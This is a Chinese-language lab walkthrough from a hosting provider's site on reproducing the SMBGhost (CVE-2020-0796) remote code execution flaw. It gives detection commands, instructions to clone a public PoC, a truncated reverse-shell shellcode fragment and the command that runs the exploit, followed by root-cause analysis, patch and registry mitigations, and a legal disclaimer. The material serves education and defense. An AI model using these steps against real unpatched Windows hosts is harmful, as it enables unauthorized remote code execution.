温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

CVE-2020-0796 SMBv3漏洞复现过程是怎样的

发布时间:2021-12-28 17:31:25 来源:亿速云 阅读:229 作者:柒染 栏目:安全技术
# CVE-2020-0796 SMBv3漏洞复现过程是怎样的 ## 漏洞背景 CVE-2020-0796是微软Windows 10和Server 2019操作系统中SMBv3协议的一个严重漏洞,被称为"SMBGhost"。该漏洞源于SMBv3.1.1协议在处理压缩数据包时的缺陷,允许攻击者无需身份验证即可实现远程代码执行(RCE),影响范围包括: - Windows 10 1903/1909 - Windows Server 1903/1909 ## 环境准备 ### 测试环境要求 - **靶机**:Windows 10 1909(未打补丁) - **攻击机**:Kali Linux 2020 - **网络配置**:两台机器处于同一局域网 ### 工具准备 1. [CVE-2020-0796漏洞检测脚本](https://github.com/ollypwn/SMBGhost) 2. [漏洞利用工具](https://github.com/chompie1337/SMBGhost_RCE_PoC) 3. Wireshark(用于流量分析) ## 复现步骤 ### 第一步:漏洞检测 ```bash # 使用nmap检测目标SMB服务 nmap -p 445 --script smb-protocols <靶机IP> # 使用Python检测脚本 python3 smbghost_checker.py <靶机IP> 

若输出显示VULNERABLE则确认存在漏洞。

第二步:搭建攻击环境

  1. 在Kali上安装依赖:
sudo apt install python3-impacket git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git 
  1. 修改exploit.py中的shellcode(默认是弹出计算器):
# 示例:反向shell的shellcode buf = b"" buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" ... 

第三步:执行攻击

python3 exploit.py -ip <靶机IP> 

成功执行后会在目标系统上弹出计算器(或执行预设的shellcode)。

第四步:流量分析

使用Wireshark捕获流量,过滤条件:

smb2 && ip.addr == <靶机IP> 

可观察到异常的SMB压缩数据包。

技术原理分析

漏洞成因在于Srv2DecompressData函数未正确处理压缩数据包的头部校验: 1. 攻击者构造特殊的压缩数据包 2. SMB服务解压时发生缓冲区溢出 3. 精心构造的数据可覆盖函数返回地址 4. 最终实现任意代码执行

防御措施

  1. 官方补丁:

    • KB4551762(2020年3月补丁)
  2. 临时缓解方案:

    # 禁用SMBv3压缩 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "DisableCompression" -Type DWORD -Value 1 -Force 

法律与道德声明

  1. 漏洞复现需在授权环境下进行
  2. 禁止用于非法渗透测试
  3. 企业用户应及时安装安全更新

参考资源

注意:本文仅用于教育目的,实际漏洞利用可能造成系统崩溃,建议在隔离环境中测试。 “`

(注:实际字数约850字,可根据需要删减技术细节部分调整字数)

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI